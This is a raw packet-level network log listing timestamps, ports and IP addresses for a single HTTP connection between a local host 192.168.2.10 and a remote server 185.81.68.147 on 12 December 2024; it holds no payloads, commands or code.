Dec 12, 2024 16:48:45.225481987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.225574970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.225855112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.226142883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.226227999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.226840973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.226933002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.227696896 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.228040934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.228132963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.228889942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.228965998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.229088068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.229938030 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.230021000 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.230042934 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.230077982 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.230954885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.231338024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.231422901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.231933117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.232127905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.232213020 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.232928991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.233148098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.233232975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.233949900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.234656096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.234950066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.235049963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.235677958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.235990047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.236082077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.236947060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.237044096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.237056017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.237066984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.237095118 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.238070011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.238080978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.238164902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.239029884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.239177942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.239701986 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.240041971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.241082907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.241094112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.241106033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.241169930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.241249084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.242050886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.242206097 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.242294073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.243119001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.243129969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.243215084 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.244095087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.244388103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.245131969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.245217085 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.245902061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.246443987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.246454000 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.246534109 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.246551991 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.247158051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.247230053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.247627974 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.248158932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.248383045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.248498917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.249208927 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.249514103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.249627113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.250164032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.250263929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.251193047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.251281977 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.251914978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.252208948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.252322912 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.253153086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.253262997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.253271103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.253281116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.253310919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.254672050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.254684925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.254801035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.255248070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.255731106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.256273985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.256361961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.257208109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.257391930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.257402897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.257504940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.257522106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.258311987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.258374929 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.258492947 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.259355068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.259494066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.259605885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.260328054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.261003017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.261120081 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.261375904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.261779070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.262419939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.262432098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.262517929 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.407325983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.407692909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.407804012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.407814980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.407918930 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.407953978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.408814907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.410006046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.410018921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.410044909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.410125017 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.410151005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.410859108 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.411525011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.411642075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.411839962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.412951946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.412966967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.413032055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.413054943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.413079023 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.413892984 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.414423943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.414541960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.414937973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.414949894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.415060997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.415966988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.417018890 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.417032003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.417056084 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.417256117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.417958021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.418245077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.418342113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.418981075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.418992996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.419074059 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.420075893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.421027899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.421041012 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.421109915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.421129942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.421145916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.422102928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.422116041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.422226906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.423048973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.423629999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.424022913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.424114943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.425127983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.425141096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.425194025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.425240040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.425251961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.426075935 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.426300049 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.427166939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.427221060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.427253008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.427305937 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.428116083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.429064989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.429167032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.429183006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.429403067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.429487944 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.430290937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.430304050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.430419922 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.431123972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.431222916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.431320906 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.432127953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.433192015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.433207035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.433274031 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.433299065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.433326006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.434182882 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.435285091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.435297966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.435309887 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.435374975 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.435389996 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.436214924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.437309027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.437323093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.437335014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.437408924 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.437446117 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.438332081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.438401937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.438561916 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.439402103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.439418077 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.439529896 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.440279961 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.441308022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.441322088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.441405058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.441416979 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.441437960 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.442362070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.442373991 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.442486048 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.443336964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.444029093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.444336891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.444349051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.444430113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.444451094 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.445384979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.445558071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.445673943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.446373940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.446590900 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.446696997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.447351933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.447526932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.447702885 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.448396921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.448564053 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.449497938 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.449573994 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.449695110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.450448990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.450550079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.451488972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.451500893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.451586008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.451596022 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.451623917 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.452470064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.453593969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.453608036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.453685045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.453707933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.453732014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.454595089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.454705954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.454824924 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.455574989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.455588102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.455707073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.456506968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.457165003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.457525015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.457632065 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.457696915 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.458549023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.458658934 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.458688021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.458719969 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.459592104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.459670067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.459784031 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.460474014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.509785891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.600929976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.600950956 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.600966930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.600979090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.601078033 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.601135969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.601526976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.601541042 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.601635933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.602551937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.602574110 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.602608919 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.603534937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.603600979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.603610992 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.604548931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.604615927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.604876041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.605581999 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.605673075 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.605801105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.606683969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.606698990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.606734037 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.607764959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.607903004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.607979059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.608655930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.608717918 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.608753920 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.609695911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.609708071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.609814882 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.610676050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.611162901 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.611690044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.611701965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.611716032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.611793041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.612699986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.612751961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.613807917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.613818884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.613831043 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.613909006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.614752054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.614825964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.614862919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.615870953 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.615927935 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.616180897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.616919994 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.616991997 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.617825985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.617849112 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.617930889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.617949963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.618827105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.618854046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.618951082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.619869947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.619894028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.619935036 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.620803118 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.620865107 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:45.621706963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.621880054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:45.621901989 CET	80	49946	185.81.68.147	192.168.2.10
